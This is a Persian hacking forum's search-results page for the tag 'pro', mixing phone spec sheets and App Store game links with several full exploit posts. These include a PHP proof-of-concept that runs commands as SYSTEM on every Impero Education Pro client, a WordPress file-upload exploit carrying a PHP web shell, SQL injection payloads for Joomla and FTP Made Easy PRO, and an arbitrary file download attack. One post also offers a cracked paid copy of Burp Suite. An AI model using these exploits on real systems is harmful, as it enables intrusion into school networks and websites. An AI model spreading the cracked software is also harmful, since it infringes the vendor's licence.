امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'pro'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

56 نتیجه پیدا شد

  1. Hacking

    /* If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/ They recently were in the news about how they implemented "anti-radicalisation" shit or something. They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me. Some reversing later, looks like Impero is completely pwned amirite. The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used. After connection, a client must authenticate. This is done by sending "-1|AUTHENTICATE\x02PASSWORD". Not even joking here. "PASSWORD" is a seperate string though, so it might be different for some special clients maybe. No idea. Then, we have full range to do whatever we want. My PoC also does negotiatiation, but I'm not sure if that's needed. We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run CLI command as SYSTEM), or OPENFILE (run visibly an EXE under whatever user, including SYSTEM), or other protocol commands, etc. There's an OSX version, but I haven't properly looked into that. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. It also runs "whoami > c:\lol.txt", also as SYSTEM. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it. Basically, if you use Impero, please don't. Oh yeah -- free speech for the win... internet censorship is <insert some expletives here>, and so are any and all RATs. - slipstream / RoL^LHQ - @TheWack0lian PoC code follows. In PHP because lol. PoC works on at least 5.x (latest). */ <?php // Impero Education Pro SYSTEM-RCE PoC // by slipstream/RoL^LHQ // greets to everyone in lizardhq! :) function PadString($str) { $size = 16; $pad = $size - (strlen($str) % $size); $padstr = ''; for ($i = 1; $i < $pad; $i++) $padstr .= chr(mt_rand(0,255)); return $str.$padstr.chr($pad); } function UnPadString($str) { return substr($str,0,-(ord(substr($str,-1)))); } function CryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); $crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv); return $crypted; } function DecryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv)); } function SendNetwork($h,$str) { global $socketid; $crypted = CryptString($socketid."|".$str); socket_write($h,strlen($crypted).'|'.$crypted); return; } function RecvNetwork($h) { $len = ''; $chr = ''; do { $len .= $chr; $chr = socket_read($h,1); } while ($chr != '|'); $len = (int)($len); if ($len < 1) die("Something's wrong. Length isn't an int."); socket_set_block($h); $crypted = socket_read($h,$len); $dec = DecryptString($crypted); global $socketid; $dec = explode('|',$dec,2); if ($socketid == -1) $socketid = $dec[0]; return $dec[1]; } function Connect($host,$port = 30015) { echo "Connecting..."; $h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_set_block($h); if ((!$h) || (!socket_connect($h,$host,$port))) { echo "failed.\n"; return false; } echo "done!\nAuthenticating..."; // authenticate SendNetwork($h,"AUTHENTICATE\x02PASSWORD"); echo "done!\nWaiting for response..."; // we should get "AUTH:OK" back $data = RecvNetwork($h); if ($data != "AUTH:OK") { echo "authentication failed.\n"; return false; } echo "authentication succeeded!\nNegotiating..."; SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea"); // we get sent 4 loads of packets. discard all. for ($i = 0; $i < 4; $i++) { RecvNetwork($h); usleep(500000); } //SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,192.168.56.101\x035003\x032015-06-11 12:17:19\x0310.0.2.255,192.168.56.255\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN"); echo "done!\n"; return $h; } function GetAllClients($h) { $pline = "SENDCLIENTS\x01604\x011\x010\x02"; echo "Getting all clients..."; SendNetwork($h,$pline); $data = RecvNetwork($h); // grab the base64 blob $data = array_pop(explode("\x02",$data)); // unbase64 and uncompress $data = gzdecode(base64_decode($data)); $ret = array(); foreach (explode("\r\n",$data) as $line) { // we only care about clientIDs $ret[] = array_shift(explode("\x03",$line)); } echo "done!\n"; return $ret; } function RunCmd($h,$ids,$cmdline) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline; echo "Sending evil RunCMD data..."; SendNetwork($h,$pline); echo "done!\n"; // if this was a real proper negoiated client we'd get something back // however, we aren't, and we're masquerading as client #0; thus, we don't. // this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :) } function RunExeAsSystem($h,$ids,$exe) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password"; echo "Sending evil RunEXE data..."; SendNetwork($h,$pline); echo "done!\n"; // we don't get a response from this one } function FindImperoServer($if,$addr) { $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1); socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if); $str = "ARE_YOU_IMPERO_SERVER"; socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016); socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0)); $r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port); if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip; return false; } $socketid = -1; echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n"; if ($argc < 2) { echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n"; echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n"; echo "[*] Example of this: ".$argv[0]." detect vboxnet0 192.168.56.255\n"; echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n"; die(); } array_shift($argv); foreach ($argv as $key=>$arg) { $detected = false; if ($arg == "detect") { if ($key + 2 >= count($argv)) continue; echo "[*] Finding Impero server...\n"; $arg = FindImperoServer($argv[$key+1],$argv[$key+2]); if ($arg == false) die("[-] Cannot find Impero server\n"); echo "[+] Found Impero server at ".$arg."\n"; $detected = true; } $h = Connect($arg); if ($h === false) continue; $clients = GetAllClients($h); RunExeAsSystem($h,$clients,"calc"); RunCmd($h,$clients,"whoami > C:\lol.txt"); echo "\n"; if ($detected) die(); }
  2. برنامه BrupeSuite رو باید حتما بشناسید . از معروف ترین ابزار های کاربردی در تست نفوذ میباشد که در جدول Top10 Security Tools کالی لینوکس قرار دارد برنامه بسیار کاربردی میباشد و میتواند در پیدا کردن باگ و اکسپلویتینگ بسیار مفید باشد . قیمت این برنامه ۲۹۹ دلار در سال میباشد که ما به رایگان در اختیار شما قرار میدهیم برای اجرا در ویندوز فایل .bat رو اجرا کنید و همه فایل ها را در یک دایرکتوری قرار دهید از قابلیت های این برنامه : P.r.o.x.y Repeater Scanner Intruder Spider(Crawler و موارد دیگر برای اجرا در لینوکس میتوانید از دستور زیر استفاده کنید لینک دانلود : با تشکر ReZa CLONER
  3. Soft-Android

    Photo Lab PRO Picture Editor اپلیکیشن اندرویدی که با امکانات کامل شامل 640 فریم ، افکت و ف/ی/ل/ت/ر جهت ایجاد طرح های جالب و مفرح در عکس ها میباشد. به کمک اپلیکیشن حرفه ای Photo Lab PRO Picture Editor به راحتی قادر خواهید بود که مونتاژ های جالب، نمادهای تصویری بانمک، کاریکاتور های کارتونی، کارت ها و wallpaper جدید خلق نمایید. اپلیکیشن Photo Lab هیچ اثر نامطلوب یا سایه داری در چاپ تصاویر جدید ایجاد نمیکند. ویژگی که بیشترین لذت را از آن خواهید برد، امکان کاریکاتوری کردن عکس هاست که تنها با یک کلیک، قابلیت تغییر چهره شما را به کاریکاتور های خنده دار و جالب دارد! جهت دانلود این نرم افزار برای سیستم عامل اندروید برروی لینک زیر کلیک کنید Photo Lab PRO Picture Editor: effects, blur & art - Apps on Google Play
  4. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: colette@defiant.com # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  5. Hacking

    # # # # # # Exploit Title: Joomla! Component Guru Pro 'promocode'- SQL Injection # Dork: N/A # Date: 17.12.2017 # Vendor Homepage: https://www.ijoomla.com/ # Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189 # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/guruBuy?promocode=[SQL] # # '%20/*!50000Procedure*/%20/*!50000Analyse*/%20(extractvalue(0%2c/*!50000concat*/(0x27%2c0x496873616e2053656e63616e%2c0x3a%2c@@version))%2c0)%2d%2d%200x2d # # # # # #
  6. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  7. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  8. Mobile-HUAWEI

    مشخصات عمومی هواوی Mate 9 Pro شبکه 2GGSM 850 / 900 / 1800 / 1900 - سیم کارت 1 & سیم کارت 2 (dual-سیم کارت model فقط) شبکه 3GHSDPA 800 / 850 / 900 / 1700(AWS) / 1900 / 2100 شبکه 4GLTE band 1(2100), 2(1900), 3(1800), 4(1700/2100), 5(850), 7(2600), 8(900), 9(1800), 12(700), 17(700), 18(800), 19(800), 20(800), 26(850), 28(700), 29(700), 38(2600), 39(1900), 40(2300), 41(2500) سیم کارتتک سیم کارت (نانو سیم کارت) ,دو سیم کارته (نانو سیم کارت, Dual Standby) تاریخ معرفی2016, نوامبر وضعیتموجود در بازار. عرضه شده در ژانویه 2017 بدنه هواوی Mate 9 Pro ابعاد152x75x7.5 میلیمتر (5.98x2.95x0.30 اینچ) وزن169 گرم (5.96 oz) صفحه نمایش هواوی Mate 9 Pro نوعصفحه نمایش لمسی خازنی AMOLED, با 16 میلیون رنگ اندازه5.5 اینچ (نسبت سطح صفحه نمایش به بدنه در حدود 73.2 درصد) وضوح1440x2560 پیکسل (در حدود 534 پیکسل در هر اینچ) قابلیت چند لمسی فن آوری محافظCorning Gorilla Glass 3 - EMUI 5.0 زنگ هواوی Mate 9 Pro انواع زنگویبریشن; MP3, WAV زنگ بلندگودارد, اسپیکرهای استریو 3.5mm jack - Active noise cancellation with dedicated mic حافظه هواوی Mate 9 Pro کارت حافظه داخل دستگاه64 گیگابایت, 4 گیگابایت RAM ,128 گیگابایت, 6 گیگابایت RAM امکانات ارتباطی هواوی Mate 9 Pro GPRS EDGE سرعتHSPA 42.2/5.76 Mbps, LTE-A (3CA) Cat12 600/150 Mbps شبکه بی سیمWi-Fi 802.11 a/b/g/n/ac, dual-band, DLNA, WiFi Direct, hotspot بلوتوثv4.2, A2DP, EDR, LE NFC مادون قرمز USBv2.0, نوع-C 1.0 reversible connector دوربین هواوی Mate 9 Pro اصلیدو تا 20 مگاپیکسل +12 مگاپیکسل, f/2.2, OIS, 2x zoom, Leica optics, phase detection & فوکوس اوتوماتیک لیزری, dual-LED (dual tone) فلش دیگر امکاناتثبت اطلاعات مکانی (geo-tagging), فوکوس لمسی (touch focus), تشخیص صورت و لبخند, پانوراما, تصویربرداری HDR فیلم برداریفیلم برداری 2160p با سرعت 30 فریم در ثانیه ثانویه8 مگاپیکسل, f/1.9, 1080p دیگر امکانات هواوی Mate 9 Pro OSسیستم عامل اندروید, نسخه 7.0 (Nougat) ChipsetHisilicon Kirin 960 CPUOcta-core (4x2.4 GHz Cortex-A73 & 4x1.8 GHz Cortex-A53) GPUMali-G71 M‍P8 موقعیت یاب (GPS)دارد, with A-GPS, GLONASS, BDS, GALILEO رادیو رنگ بندیطلایی, خاکستری حسگرهاFingerprint (front-mounted), شتاب سنج, ژیروسکوپ, حسگر مجاورتی, فشارسنج, قطب نما پیغام رسانیSMS (threaded view), MMS, Email, Push Email مرورگر وبHTML5 جاوا - Fast battery charging - DivX/XviD/MP4/H.265/WMV player - MP3/eAAC+/WMA/WAV/Flac player - Document editor
  9. Mobile-HUAWEI

    مشخصات عمومی هواوی Honor 8 Pro شبکه 2G GSM 850 / 900 / 1800 / 1900 - سیم کارت 1 & سیم کارت 2 شبکه 3G HSDPA 850 / 900 / 1900 / 2100 شبکه 4G LTE سیم کارت دو سیم کارته (نانو سیم کارت, Dual Standby) تاریخ معرفی 2017, فوریه وضعیت موجود در بازار. عرضه شده در مارس 2017 بدنه هواوی Honor 8 Pro ابعاد 157x77.5x7 میلیمتر (6.18x3.05x0.28 اینچ) وزن 184 گرم (6.49 oz) صفحه نمایش هواوی Honor 8 Pro نوع صفحه نمایش لمسی خازنی LTPS IPS LCD, با 16 میلیون رنگ اندازه 5.7 اینچ (نسبت سطح صفحه نمایش به بدنه در حدود 73.6 درصد) وضوح 1440x2560 پیکسل (در حدود 515 پیکسل در هر اینچ) قابلیت چند لمسی - Emotion UI 5 زنگ هواوی Honor 8 Pro انواع زنگ ویبریشن; MP3, WAV زنگ بلندگو 3.5mm jack - DTS sound enhancement - Active noise cancellation with dedicated mic حافظه هواوی Honor 8 Pro کارت حافظه microSD, تا 256 گیگابایت (uses سیم کارت 2 slot) داخل دستگاه 64 گیگابایت, 4 گیگابایت RAM ,128 گیگابایت, 6 گیگابایت RAM امکانات ارتباطی هواوی Honor 8 Pro GPRS EDGE سرعت HSPA 42.2/5.76 Mbps, LTE-A (2CA) Cat6 300/50 Mbps شبکه بی سیم Wi-Fi 802.11 a/b/g/n/ac, dual-band, DLNA, WiFi Direct, hotspot بلوتوث v4.2, A2DP, LE NFC مادون قرمز USB v2.0, نوع-C 1.0 reversible connector دوربین هواوی Honor 8 Pro اصلی دو تا 12 مگاپیکسل, f/2.2, phase detection, فوکوس اوتوماتیک لیزری, dual-LED (dual tone) فلش دیگر امکانات ثبت اطلاعات مکانی (geo-tagging), فوکوس لمسی (touch focus), تشخیص چهره, تصویربرداری HDR, پانوراما فیلم برداری فیلم برداری 2160p با سرعت 30 فریم در ثانیه, فیلم برداری 1080p با سرعت 60 فریم در ثانیه ثانویه 8 مگاپیکسل, f/2.0, 1080p دیگر امکانات هواوی Honor 8 Pro OS سیستم عامل اندروید, نسخه 7.0 (Nougat) Chipset HiSilicon Kirin 960 CPU Octa-core (4x2.4 GHz Cortex-A73 & 4x1.8 GHz Cortex-A53) GPU Mali-G71 M‍P8 موقعیت یاب (GPS) دارد, with A-GPS, GLONASS, BDS رادیو رنگ بندی طلایی, آبی حسگرها Fingerprint (rear-mounted), شتاب سنج, ژیروسکوپ, حسگر مجاورتی, قطب نما پیغام رسانی SMS(threaded view), MMS, Email, Push Mail, IM مرورگر وب HTML5 جاوا - MP4/H.264 player - MP3/eAAC+/WAV/Flac player - Document viewer - Photo/video editor باطری هواوی Honor 8 Pro Non-removable Li-Po 4000 mAh battery سایر موارد هواوی
  10. Soft-Apple

    بازی AA Slots HD Pro AA Slots HD Pro on the App Store
  11. Soft-Apple

    بازی AA Slots Pro AA Slots Pro on the App Store
  12. Soft-Apple

    بازی AAA Aaron Astronaut At Big Bang Space Bingo PRO AAA Aaron Astronaut At Big Bang Space Bingo PRO on the App Store
  13. Soft-Apple

    بازی AAA 204Eight Blocks Pro - Fun brain teasers and math strategy puzzle AAA 204Eight Blocks Pro - Fun brain teasers and math strategy puzzle on the App Store
  14. Soft-Apple

    بازی AA Circle Color - Pro Edition AA Circle Color - Pro Edition on the App Store
  15. Soft-Apple

    بازی Jewel Breaker Pro AA Jewel Breaker Pro on the App Store
  16. Mobile-SAMSUNG

    مشخصات عمومی سامسونگ Galaxy Pro B7510 شبکه 2G GSM 850 / 900 / 1800 / 1900 شبکه 3G HSDPA 900 / 2100 تاریخ معرفی 2011, مارس وضعیت موجود در بازار. عرضه شده در آوریل 2011 اندازه سامسونگ Galaxy Pro B7510 ابعاد 108.6x66.7x10.7 میلیمتر وزن 103.4 گرم صفحه نمایش سامسونگ Galaxy Pro B7510 نوع صفحه نمایش لمسی خازنی TFT, با ‬256 هزار رنگ اندازه 320x240 پیکسل, 2.8 اینچ - QWERTY keyboard - Accelerometer sensor for UI auto-rotate - Proximity sensor for auto turn-off زنگ سامسونگ Galaxy Pro B7510 انواع زنگ ویبریشن; MP3 زنگ بلندگو 3.5mm jack حافظه سامسونگ Galaxy Pro B7510 دفتر تلفن تعداد نامحدود و همراه همه جزئیات, حافظه تصویری حافظه تماس ها نامحدود داخل دستگاه 512 MB حافظه داخلی کارت حافظه microSD, تا 32 گیگابایت, به همراه کارت 2 گیگابایتی امکانات ارتباطی سامسونگ Galaxy Pro B7510 GPRS EDGE 3G HSDPA, 7.2 Mbps شبکه بی سیم Wi-Fi 802.11 b/g/n, Wi-Fi hotspot بلوتوث دارد, v2.1 with A2DP مادون قرمز USB دارد, microUSB v2.0 دوربین سامسونگ Galaxy Pro B7510 اصلی 3.15 مگاپیکسل, 2048x1536 پیکسل دیگر امکانات Smile shutter فیلم برداری دارد, QVGAبا سرعت 30 فریم در ثانیه ثانویه دیگر امکانات سامسونگ Galaxy Pro B7510 OS سیستم عامل اندروید, نسخه 2.2 (Froyo) CPU 800 MHz processor پیغام رسانی SMS(threaded view), MMS, Email, Push Mail, IM, RSS مرورگر وب HTML رادیو رادیو FM استریو با امکان دریافت پیامهای متنی (RDS) بازی ها دارد + قابل دانلود رنگ بندی مشكی, سفيد موقعیت یاب (GPS) دارد, with A-GPS support جاوا دارد, via جاوا MIDP emulator - SNS integration - Digital compass - DivX/Xvid/MP4/WMV/H.264 player - MP3/WAV/eAAC+ player - Organizer - Image/video editor - ThinkFree document viewer/editor - Google Search, Maps, Gmail, YouTube, Calendar, Google Talk, Picasa integration - Adobe Flash 10.1 support - Voice memo/dial - Predictive text input باطری سامسونگ Galaxy Pro B7510 Standard battery, Li-Ion 1350 mAh زمان آماده باش تا 610 ساعت (2G) / تا 430 ساعت (3G) زمان صحبت تا 11 ساعت (2G) / تا 6 ساعت و 10 دقیقه (3G)
  17. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  18. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  19. Soft-Apple

    بازی AA Tap - Pro Edition AA Tap - Pro Edition on the App Store
  20. Soft-Apple

    بازی Quiz Party Mania Pro - cool brain twister A1 Quiz Party Mania Pro - cool brain twister on the App Store
  21. Soft-Apple

    بازی Pin Bowling Ball Fall Pro A1 Pin Bowling Ball Fall Pro on the App Store
  22. Soft-Apple

    بازی Party Slushie Maker Mania Pro - best virtual drink making game A1 Party Slushie Maker Mania Pro - best virtual drink making game on the App Store
  23. Soft-Apple

    بازی A.L.E.X. PRO A.L.E.X. PRO on the App Store
  24. Soft-Apple

    بازی Kids Painting Book Pro - awesome digital sketch coloring A1 Kids Painting Book Pro - awesome digital sketch coloring on the App Store
  25. Soft-Apple

    بازی Word Guessing Trivia Pro - mind challenge test A1 Word Guessing Trivia Pro - mind challenge test on the App Store